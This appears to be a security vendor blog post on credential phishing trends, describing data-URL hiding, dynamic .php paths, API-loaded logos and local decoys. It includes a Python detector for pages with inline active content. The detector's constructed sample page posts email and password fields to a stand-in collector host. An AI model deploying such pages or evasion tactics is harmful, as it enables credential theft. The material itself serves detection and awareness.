The Expanding Scope and Complexity of Credentials Phishing

Without our wallet or keys, we can’t get very far.

Most of us are entirely reliant on these essential items to purchase goods and services, access our cars and unlock our front doors. And what if they got into the wrong hands? The idea of losing them is somewhat anxiety inducing.

In today’s world, however, it is not just our keys and wallets that we have to keep hold of. Online, credentials such as email addresses, user IDs, PINs and passwords have become the digital equivalent, and protecting them is arguably even more important.

Our ability to access social media platforms, e-commerce sites and streaming services is almost entirely dependent on credentials, and so is our access to highly confidential and sensitive services such as digital banking and online doctor’s records. The criminal value of stealing our credentials is, therefore, plain to see.

In March 2021, our team at Menlo Labs observed a steady rise in credential phishing attacks.

Indeed, they are nothing new. In essence, threat actors attempt to steal user ID/email address and PIN/password combinations by creating fake login pages or forms that masquerade as a trusted entity.

The bulk of these credential phishing attacks continue to come in the form of fake Microsoft software – namely Outlook and Office 365.

Regarding the latter, the travel industry (and more specifically airline duty-free shop login credentials) has been a key target of late, accounting for 51% of all Office 365 phishing attacks, followed by healthcare and medicine (26.8%) and technology (7.3%).

Office 365 being a focal attack point should come as no surprise given its widespread usage in corporate environments. Yet there has also been an uptick in the number of phishing pages impersonating cloud services such as Azure, OneDrive, Box, Firebase, Dropbox and more recently, Evernote.

The challenge of credentials phishing is not simply related to expanding volumes or platforms either. Equally, increasingly complex tactics are being deployed by attackers to better trick their targets.

We’ve observed a number of these currently occurring within the threat environment, the first being the usage of data URLs to mask content.

Here, threat actors hide the JavaScript that posts credentials to a remote URL, along with custom CSS and images, inside the page itself, so the phishing page renders in the browser in a single load. Because no additional resource requests are made, this evades security solutions that rely on the Content-Type header of each fetched resource to identify JavaScript or CSS.
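As an added example (not code from the Menlo Labs post), the following Python inspector examines the fetched page body itself rather than the Content-Type headers of follow-up requests: it decodes data: URLs, records the MIME types that never crossed the wire as separate resources, and flags a page that also posts its login form to a host other than the page's own. The page, hostnames and embedded payloads are constructed for the demonstration.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# data: URL = optional MIME type, optional ;parameters (e.g. base64), then the body.
DATA_URL = re.compile(r"^data:(?P<mime>[^;,]*)(?P<params>(?:;[^,]*)*),(?P<body>.*)$", re.S)
# Active types a Content-Type based filter would normally see on the wire; embedded inline, no request is made.
ACTIVE_MIME = {"text/javascript", "application/javascript", "text/css", "text/html"}

class EmbeddedResourceScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.embedded, self.form_actions = [], []  # (tag, mime, decoded payload), form action URLs

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        for key in ("src", "href"):
            m = DATA_URL.match((a.get(key) or "").strip())
            if not m:
                continue
            body = m.group("body")
            payload = (base64.b64decode(body + "=" * (-len(body) % 4))
                       if ";base64" in m.group("params").lower() else unquote(body).encode())
            self.embedded.append((tag, (m.group("mime") or "text/plain").lower(), payload))
        if tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])

def analyse(html, page_host):
    """Flag a page that embeds active content inline AND posts a form to another host."""
    s = EmbeddedResourceScanner()
    s.feed(html)
    active = [(m, p) for _, m, p in s.embedded if m in ACTIVE_MIME]
    foreign = [u for u in s.form_actions
               if urlparse(u).hostname and urlparse(u).hostname != page_host]
    return {"embedded_resources": len(s.embedded),
            "embedded_active_mimes": sorted({m for m, _ in active}),
            "foreign_form_actions": foreign,
            "suspicious": bool(active) and bool(foreign)}

# Constructed sample (not a real kit): script and stylesheet are data: URLs and
# the credential form posts to a host other than the page's own.
SAMPLE_JS = b"document.forms[0].action='https://collector.example/post.php';"
SAMPLE_CSS = b"body{background:#fff}"
SAMPLE_HTML = f"""<html><head>
<link rel="stylesheet" href="data:text/css;base64,{base64.b64encode(SAMPLE_CSS).decode()}">
<script src="data:application/javascript;base64,{base64.b64encode(SAMPLE_JS).decode()}"></script>
</head><body><img src="data:image/png;base64,iVBORw0KGgo=">
<form method="post" action="https://collector.example/post.php"><input name="email">
<input name="password" type="password"></form></body></html>"""
```

Run `analyse(SAMPLE_HTML, "login.example")` to see the page flagged; the same page served from collector.example is not, since the form then posts to its own host.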

Dynamic content generation is a second, particularly novel tactic that we recently observed in an Office 365 phishing campaign. The user’s email address is appended to the end of the URL; the phishing page path is then generated dynamically and the same email address is automatically filled in.

Because the phishing landing page is generated dynamically, the pathname is not only long but made up of two parts: a randomly generated folder name followed by a randomly generated .php file name.

Why is this significant? The dynamic generation of .php files allows the phishing kit to evade signature-based detection solutions that rely on detection patterns related to filename/filepaths.

The dynamic loading of brand logos is another tactic we have observed, whereby phishing pages use third-party APIs to look up and load company-specific logos to better trick end users. Using the API of the marketing data engine Clearbit, for example, attackers can dynamically display a company’s logo without ever making a request to that company’s own site.

Fourthly, we’ve seen local HTML and PDF files used as decoys so that the content is loaded on the endpoint. The core advantage here is that, because the content is loaded locally, it can avoid detection by content inspection mechanisms.

Indeed, these are just four recently observed examples of increasingly complex phishing tactics, yet there is a growing sea of other techniques being developed and deployed by attackers on a daily basis.

There is no easy answer to overcoming these challenges, but with 19 in every 20 cyber-attacks resulting from the actions of humans, the first port of call for any organization should be extensive cybersecurity awareness training and education initiatives.

Users should always be cautious and vigilant of sites which present forms and login requests that ask for credentials. By providing such education, companies can diminish the threat from phishing attacks by promoting better practices.
